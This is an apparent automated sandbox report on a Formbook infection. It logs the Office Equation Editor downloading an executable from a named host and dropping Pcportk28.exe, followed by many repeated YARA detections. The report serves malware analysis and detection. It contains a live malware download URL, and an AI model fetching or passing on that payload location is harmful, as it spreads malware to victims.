Source: global traffic | HTTP traffic detected: GET /E9/i4L.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Connection: Keep-Alive | Host: mikeloayza.com
Source: global traffic | HTTP traffic detected: GET /E9/i4L.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: mikeloayza.com | Connection: Keep-Alive
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown | Network traffic detected: HTTP traffic on port 49168 -> 443
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Fri, 14 Jan 2022 15:06:04 GMT | Content-Type: text/html | Content-Length: 275 | ETag: "618be761-113" | Via: 1.1 google | Connection: close | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000006.00000000.493463383.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.503184822.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000006.00000000.498553162.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.498553162.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000006.00000000.497685808.0000000001BE0000.00000002.00020000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.551082192.0000000003E50000.00000002.00020000.sdmp | String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.498553162.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.493463383.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.493463383.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.498553162.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000006.00000000.497685808.0000000001BE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.503184822.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000006.00000000.493463383.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.498553162.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.493463383.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.501623480.0000000008405000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.499989252.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.552496402.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.493389114.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.551993194.0000000004513000.00000004.00000001.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.501623480.0000000008405000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.552496402.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.493389114.00000000045D6000.00000004.00000001.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.503184822.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000006.00000000.503184822.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000006.00000000.503184822.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\i4L[1].htm
Source: unknown | DNS traffic detected: queries for: mikeloayza.com

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 5.2.Pcportk28.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.Pcportk28.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.Pcportk28.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.Pcportk28.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.Pcportk28.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.Pcportk28.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.Pcportk28.exe.36cb410.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.Pcportk28.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.Pcportk28.exe.3722430.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 5.2.Pcportk28.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.Pcportk28.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.Pcportk28.exe.400000.9.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.Pcportk28.exe.400000.9.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.Pcportk28.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.Pcportk28.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.Pcportk28.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.Pcportk28.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.Pcportk28.exe.400000.9.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.Pcportk28.exe.400000.9.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.Pcportk28.exe.400000.7.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.Pcportk28.exe.400000.7.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.Pcportk28.exe.36cb410.6.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.Pcportk28.exe.36cb410.6.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.Pcportk28.exe.400000.7.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.Pcportk28.exe.400000.7.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.Pcportk28.exe.3722430.5.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.Pcportk28.exe.3722430.5.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\i4L[1].exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\Pcportk28.exe
          Source: 5.2.Pcportk28.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.Pcportk28.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.Pcportk28.exe.400000.9.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.Pcportk28.exe.400000.9.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.Pcportk28.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.Pcportk28.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.Pcportk28.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.Pcportk28.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.Pcportk28.exe.400000.9.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.Pcportk28.exe.400000.9.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.Pcportk28.exe.400000.7.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.Pcportk28.exe.400000.7.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.Pcportk28.exe.36cb410.6.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.Pcportk28.exe.36cb410.6.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.Pcportk28.exe.400000.7.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.Pcportk28.exe.400000.7.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.Pcportk28.exe.3722430.5.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.Pcportk28.exe.3722430.5.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
